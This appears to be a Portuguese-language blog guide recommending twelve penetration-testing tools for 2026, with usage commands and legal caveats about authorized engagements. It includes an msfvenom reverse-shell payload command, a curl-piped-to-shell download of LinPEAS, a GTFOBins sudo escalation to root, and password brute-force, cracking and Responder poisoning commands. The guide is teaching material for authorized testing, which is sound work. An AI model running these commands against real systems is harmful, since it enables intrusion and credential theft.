Ferramentas de Pentest: 12 Essenciais para 2026

Como Selecionamos Estas Ferramentas de Pentest

Três filtros se aplicam. Primeiro, manutenção ativa. Ferramentas sem release significativo desde 2022 foram cortadas, não importa quão amadas fossem há uma década. As ameaças evoluem, e ferramentas que não evoluem com elas viram um peso. Segundo, a ferramenta tem que mapear para uma fase clara do pentest. Um framework genérico que "faz tudo" geralmente não faz nada bem. Terceiro, a ferramenta tem que aparecer em relatórios reais de missão, daqueles apresentados a um CISO. Ferramentas que existem principalmente em palestras de conferência e prints do Twitter ficaram de fora.

O que esta lista não é: um catálogo exaustivo. Kali Linux traz centenas de ferramentas. A maioria fica sem uso em /usr/bin enquanto você pega as mesmas cinco todo dia. Selecionamos as cinco (bem, doze) que você de fato usaria.

O que esta lista também não é: um curso introdutório. Assumimos que você sabe o que é TCP, já usou um terminal e entende a diferença entre payload e exploit. Se esses conceitos são novos, treine antes em alvos vulneráveis intencionais para construir o modelo mental antes de pegar nestas ferramentas.

Ferramentas de Reconhecimento e Enumeração

O reconhecimento é o ponto de partida de toda missão e a fase em que pentesters iniciantes investem menos tempo. Pule o reconhecimento e perde o subdomínio de homologação meio esquecido que guarda credenciais de produção. As ferramentas abaixo constroem seu mapa do alvo antes de qualquer ação agressiva.

1. Nmap

Nmap continua sendo o scanner de rede padrão em 2026, e isso não é por falta de alternativas. É porque o Nmap acertou os fundamentos em 1997 e nunca deixou de ser mantido. A versão 7.94 (lançada em 2023) trouxe melhor suporte a IPv6 e detecção de serviço aprimorada para variantes HTTPS modernas.

O comando que você roda em toda missão:

nmap -sV -sC -p- -T4 target.com -oA scan-initial

Isso varre todas as 65.535 portas TCP (-p-), faz detecção de versão (-sV), executa o conjunto de scripts padrão (-sC), usa timing agressivo (-T4) e salva a saída em três formatos (-oA). Em um servidor Linux típico, espere de 5 a 15 minutos por host, dependendo do rate limiting.

Para o conjunto completo de flags comuns e one-liners, nosso guia rápido do Nmap reúne os padrões que você mais vai copiar.

2. Gobuster

O Gobuster faz brute force de diretórios e arquivos sem o peso gráfico das ferramentas mais antigas. Escrito em Go, escala de forma limpa e produz uma saída suficientemente limpa para passar no grep depois. O comando padrão:

gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -t 50

A escolha da wordlist importa mais que qualquer flag. O raft-medium-directories.txt da SecLists costuma encontrar 30 por cento mais endpoints do que o dirb/common.txt padrão do Kali, em tempo comparável. Nosso guia de wordlists do Gobuster mostra qual lista usar para qual cenário.

Na prática, rode o Gobuster em paralelo à navegação manual durante a fase de mapeamento. Quando você terminar de clicar pela aplicação como um usuário comum, o Gobuster já fez aparecer o painel de administração que nunca esteve linkado na navegação pública.

3. Amass

O Amass é a ferramenta de enumeração de subdomínios que não é discutida o suficiente. Ele agrega dados de logs de transparência de certificados, registros DNS públicos, resultados de buscadores e arquivos web para construir uma imagem completa da pegada externa de uma organização. A invocação básica:

amass enum -d target.com -o subdomains.txt

A maioria das missões coloca alguns domínios principais em escopo. Rode o Amass contra cada um antes de começar a varrer. O ambiente de homologação esquecido, a landing page de marketing dormente, o portal legado do cliente que ainda autentica contra o AD de produção: é onde os achados críticos vivem.

Ferramentas de Teste de Aplicações Web

Aplicações web são onde a maioria dos achados do mundo real aparece. O DBIR 2024 da Verizon apontou aplicações web como vetor inicial em 26 por cento das brechas confirmadas. As ferramentas abaixo dão conta da maior parte do teste de aplicações web.

4. Burp Suite

Burp Suite é o centro de toda missão web e o motivo pelo qual a maioria dos pentesters tolera Java. A Community Edition é gratuita e dá conta de talvez 80 por cento dos workflows comuns. A Pro Edition adiciona scanner automatizado, Intruder em velocidade plena e Collaborator para testes out-of-band.

As quatro funções que você usa todo dia: Proxy para interceptar requisições, Repeater para modificar e reenviar requisições individuais, Intruder para fuzzing de parâmetros e a site map para entender a estrutura da aplicação. Domine essas funções antes de tocar em qualquer outra coisa do menu.

Se você nunca rodou Burp, nosso tutorial do Burp Suite cobre a primeira hora de configuração e o workflow que você vai usar em toda missão.

5. sqlmap

Depois de confirmar manualmente um ponto de injeção, o sqlmap automatiza a extração. Salve a requisição do Burp em arquivo, depois aponte o sqlmap para ele:

sqlmap -r request.txt --batch --level=3 --risk=2

A regra profissional: manual primeiro, sqlmap depois. Rodar sqlmap contra uma aplicação desconhecida gera centenas de requisições, pode derrubar backends instáveis e dispara alertas de WAF que encerram seu acesso. Confirme a injeção à mão com uma aspa simples, identifique o parâmetro, e então deixe o sqlmap cuidar da extração.

Uma observação prática: o sqlmap é excelente contra MySQL, PostgreSQL, MSSQL e Oracle. Bancos de dados na nuvem mais novos e alguns backends NoSQL às vezes exigem técnica manual. A ferramenta não substitui entender o que a injeção realmente faz no parser por trás.

6. ffuf

O ffuf (Fuzz Faster U Fool) faz o que o Gobuster faz para diretórios, mais o fuzzing de parâmetros e cabeçalhos que o Gobuster não oferece. Quando você precisa descobrir parâmetros de URL escondidos ou fuzzar cabeçalhos HTTP atrás de candidatos a SSRF, ffuf é a ferramenta para usar:

ffuf -u https://target.com/api?FUZZ=test -w params.txt -mc 200

A flexibilidade vive na filtragem: combine por código de status, tamanho de resposta, número de palavras ou número de linhas. Páginas 404 personalizadas que enganam o Gobuster costumam ser pegas pelo ffuf com a flag -fs de tamanho de resposta.

Frameworks de Exploração

Depois do mapeamento e da descoberta vem a exploração. As ferramentas abaixo pegam uma vulnerabilidade que você encontrou e a transformam em algo que você pode demonstrar para um cliente.

7. Metasploit Framework

O Metasploit Framework continua relevante em 2026 por um motivo: quando o exploit que você precisa existe, o Metasploit costuma ter um módulo estável para ele. O framework traz milhares de exploits, payloads, encoders e módulos de pós-exploração. Rode msfconsole e comece configurando o workspace:

workspace -a engagement-name
db_nmap -sV -p- target.com
search type:exploit name:cve-2023-

O comando db_nmap importa os resultados do scan direto para o banco do Metasploit, então buscas e módulos seguintes podem referenciar hosts-alvo sem digitar IPs à mão. Busque por CVE, por nome de serviço ou por versão de software. A taxa de acerto em missão real: talvez um achado em vinte acabe usando um módulo padrão do Metasploit, mas quando funciona, a prova de conceito se escreve sozinha.

Uma observação honesta sobre detecção. EDRs de produção pegam payloads padrão do Metasploit. Esse é o comportamento esperado em ambiente protegido, não falha da ferramenta. O caminho é gerar payload customizado, e é aí que entra o msfvenom.

8. msfvenom

O msfvenom é o gerador de payloads que vem com o Metasploit. Você monta payloads específicos para cada plataforma, codifica para lidar com bad characters e produz no formato que seu método de entrega exige. O one-liner de reverse shell que todo mundo acaba memorizando:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.1 LPORT=4444 -f elf -o payload.elf

Nosso guia rápido do msfvenom cobre as combinações de plataforma e formato que você de fato precisa: EXE Windows, ELF Linux, webshells PHP, JSP para Tomcat, ASP para IIS. Memorize três delas, busque o resto quando precisar.

Na prática, gere o payload, configure o listener com multi/handler, e dispare a execução pelo que a vulnerabilidade permitir. O esforço está na descoberta da vulnerabilidade; gerar payload é mecânico depois que você fez duas vezes.

Ferramentas de Quebra de Senhas

Hashes de senha aparecem por toda parte em um pentest: arquivos shadow vindos de escalada de privilégios, dumps NTDS.dit do Active Directory, extrações de banco via injeção SQL, hashes NTLMv2 capturados com Responder. Três ferramentas dão conta de 95 por cento do trabalho.

9. Hashcat

O Hashcat é o cracker acelerado por GPU, e em hardware moderno é dramaticamente mais rápido que qualquer coisa baseada em CPU. Uma única RTX 4090 processa mais de 200 bilhões de hashes MD5 por segundo. O workflow padrão:

hashcat -m 1000 -a 0 ntlm-hashes.txt rockyou.txt -r best64.rule

Esse comando roda o modo 1000 (NTLM), modo de ataque 0 (dicionário), contra ntlm-hashes.txt usando a wordlist rockyou com o conjunto de regras best64 aplicado. Para a cobertura completa de tipos de hash, modos de ataque e estratégias de wordlist, nosso tutorial de hash cracking percorre o workflow de ponta a ponta.

10. John the Ripper

O John the Ripper é o que você usa quando flexibilidade de formato importa mais que velocidade bruta. O John lida com mais de 400 formatos de hash e cifra nativamente, incluindo formatos exóticos (chaveiros do Mac OS X, arquivos ID do Lotus Notes, bases KeePass) onde o suporte do Hashcat é irregular.

john --wordlist=rockyou.txt --rules=KoreLogic shadow.txt

Na prática, rode o John quando o Hashcat não suportar o formato. Caso contrário, o Hashcat ganha em velocidade toda vez. As duas ferramentas se complementam; o falso debate é qual usar de forma exclusiva.

11. Hydra

O Hydra é a ferramenta de ataque online de senhas: brute force de SSH, brute force de formulário HTTP, FTP, RDP, SMB. Use com parcimônia. Ataques online geram ruído, travam contas e disparam detecção. Quando o escopo da missão autoriza explicitamente teste de credenciais contra um formulário de login exposto, Hydra é a ferramenta certa:

hydra -L users.txt -P passwords.txt ssh://target.com -t 4

Limite agressivamente (-t 4 significa quatro threads paralelas, não quarenta). Políticas de bloqueio de conta vão queimar sua wordlist antes de você achar qualquer coisa se você correr atrás do limite de taxa.

Ferramentas de Escalada de Privilégios

Você conseguiu um shell de baixo privilégio. E agora? As ferramentas abaixo automatizam a enumeração tediosa que separa o pentester casual de quem escala para root de forma consistente.

12. LinPEAS, WinPEAS e GTFOBins

O kit de escalada de privilégios é, na verdade, três recursos trabalhando juntos: dois scripts de enumeração e um catálogo de referência.

LinPEAS é um script bash único que enumera todo vetor de escalada Linux que você verificaria à mão. Binários SUID, permissões sudo, capabilities, arquivos world-writable, versão do kernel, jobs do cron, sistemas de arquivos montados, variáveis de ambiente: tudo verificado, depois colorido por exploitabilidade.

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

A saída é verbosa. Amarelo significa interessante; vermelho significa escalada provável. Passe o olho atrás do vermelho, depois verifique cada achado manualmente. O LinPEAS às vezes dá falso positivo, principalmente em distros endurecidas.

WinPEAS é o equivalente Windows. Mesma ideia: enumeração automatizada completa, saída colorida, te apontando para o vetor mais promissor. Verifica serviços instalados, permissões de registro, tarefas agendadas, AlwaysInstallElevated, caminhos de serviço sem aspas, credenciais armazenadas e relações de confiança do AD. Rode a partir de um shell de baixo privilégio, leia as entradas vermelhas, valide manualmente antes de explorar. A combinação de LinPEAS e WinPEAS substitui cerca de três horas de consultas manuais com find e wmic em toda missão.

GTFOBins não é uma ferramenta que você instala; é uma referência curada em gtfobins.github.io que cataloga binários Unix exploráveis para escalada de privilégios. Quando o LinPEAS faz aparecer uma permissão sudo como (ALL) NOPASSWD: /usr/bin/find, o GTFOBins diz exatamente como transformá-la em arma:

sudo find . -exec /bin/sh \; -quit

Shell root. O mesmo padrão de busca funciona para binários SUID, atribuições de capabilities e fugas de shell limitado. Memorize a URL; você vai digitar muito. O análogo Windows é o LOLBAS em lolbas-project.github.io.

Análise de Rede e Tráfego

Algumas missões te jogam em uma rede e perguntam o que você consegue ver. As ferramentas abaixo decodificam o cabo e extraem credenciais dos broadcasts que ninguém percebeu que estavam sendo transmitidos.

Wireshark

O Wireshark é o analisador de protocolo. PCAP capturado em escopo interno, tráfego suspeito de uma resposta a incidente, captura de pacotes de um desafio CTF: o Wireshark lê todos. Os filtros de exibição são onde está o valor:

http.request.method == "POST" and http.request.uri contains "login"
tcp.stream eq 5
tls.handshake.extensions_server_name == "target.com"

Para um pentest de rede autorizado, rode uma captura no segmento que você acessa, depois filtre por credenciais em texto claro, hostnames internos e padrões de tráfego incomuns. Os protocolos legados que não deveriam mais existir em redes modernas (LLMNR, NBNS, telnet, FTP em texto claro) ainda existem em um número surpreendente de LANs corporativas.

Responder

O Responder é o envenenador LLMNR, NBT-NS e MDNS usado em pentests internos autorizados. Quando um cliente Windows consulta um hostname que o DNS não resolve, o Responder responde, o cliente tenta autenticar e você captura o hash NTLMv2 para quebrar offline com Hashcat.

responder -I eth0 -wrf

Use o Responder apenas com autorização escrita explícita para teste de rede interna. A ferramenta gera tentativas reais de autenticação contra sua máquina; rodá-la em uma rede que não é sua é crime na maioria das jurisdições. Quando o escopo da missão menciona avaliação interna de AD, esta é a ferramenta padrão.

Ferramentas de Pentest para Ignorar em 2026

Um guia do que usar fica incompleto sem um guia do que ignorar. As ferramentas abaixo aparecem em artigos mais antigos mas não valem mais a instalação.

Ignore a interface gráfica do DirBuster. A GUI Java é absurdamente lenta comparada a ffuf ou Gobuster e não acrescenta nada que a CLI não resolva melhor.

Ignore o THC-IPV6. O ferramental IPv6 não tem manutenção significativa há anos, e o teste de rede moderno usa o suporte nativo do scanner (o Nmap suporta IPv6 com -6 desde a versão 7.20).

Ignore plataformas genéricas "tudo-em-um" que prometem "automatizar o pentest inteiro". As ferramentas acima existem na forma atual porque pentest não pode ser totalmente automatizado. Uma plataforma que diz o contrário está vendendo varredura de vulnerabilidades com outro nome.

Ignore qualquer ferramenta cujo último commit seja anterior a 2022, não importa quão famosa ela tenha sido. A web mudou; ferramentas que não mudaram com ela produzem saída desatualizada e falsos negativos que desperdiçam horas do seu orçamento de missão.

Construindo Seu Primeiro Kit de Ferramentas de Pentest

O erro que a maioria dos iniciantes comete é instalar todas as ferramentas deste guia no primeiro dia. Três semanas depois, usaram o Nmap duas vezes e esqueceram para que serve o resto.

A progressão que de fato funciona:

1. Instale o Kali Linux em uma VM, ou use as imagens Docker oficiais para ferramentas individuais.
2. Passe um mês ficando fluente em Nmap. Rode contra todo alvo de CTF que você tocar. Leia a saída até conseguir prevê-la.
3. Adicione Burp Suite Community. Faça seu navegador passar pelo proxy dele para navegação web normal, não só para teste. A intuição para tráfego HTTP vem de vê-lo se mover, não de ler a respeito.
4. Adicione sqlmap e Gobuster. Use em apps intencionalmente vulneráveis até conseguir rodar sem pensar.
5. Adicione Hashcat para qualquer hash de senha que aparecer em CTFs.
6. Adicione Metasploit quando você tiver uma vulnerabilidade que peça um exploit, não antes.
7. Pegue LinPEAS e WinPEAS na primeira vez que conseguir um shell de baixo privilégio.

Repare no que não está nesta lista: não há etapa "memorize 100 comandos de um guia rápido". Os guias rápidos existem como referência para quando você precisar. Construa memória muscular pela repetição em alvos reais, não com cartões de revisão. O índice oficial de ferramentas do Kali é o lugar certo para procurar flags que você esquece; não tente memorizá-lo.

Considerações legais e éticas

Missões autorizadas, competições CTF e seus próprios ambientes de laboratório dedicados são os únicos contextos seguros para as ferramentas deste guia. Seu documento de escopo deveria listar explicitamente cada categoria de ferramenta que você pretende usar, em particular ferramentas intrusivas como Hydra e Responder, onde o ruído ambiente pode atrapalhar sistemas de produção.

Para prática, use ambientes feitos para isso: laboratórios HackerDNA, VMs do VulnHub ou setups Docker locais de aplicações intencionalmente vulneráveis. Existem especificamente para aprendizado de segurança ofensiva e não trazem exposição jurídica. O OWASP Top 10 e o framework MITRE ATT&CK publicam as técnicas por trás das ferramentas acima, o que ajuda quando você precisa associar um achado a uma categoria de vulnerabilidade reconhecida no seu relatório.

Quando uma missão autorizar essas ferramentas, documente o que você rodou, quando e contra o quê. A trilha de auditoria protege tanto você quanto o cliente. Se um incidente posterior for investigado, sua saída do sqlmap com timestamps prova que você estava dentro do escopo.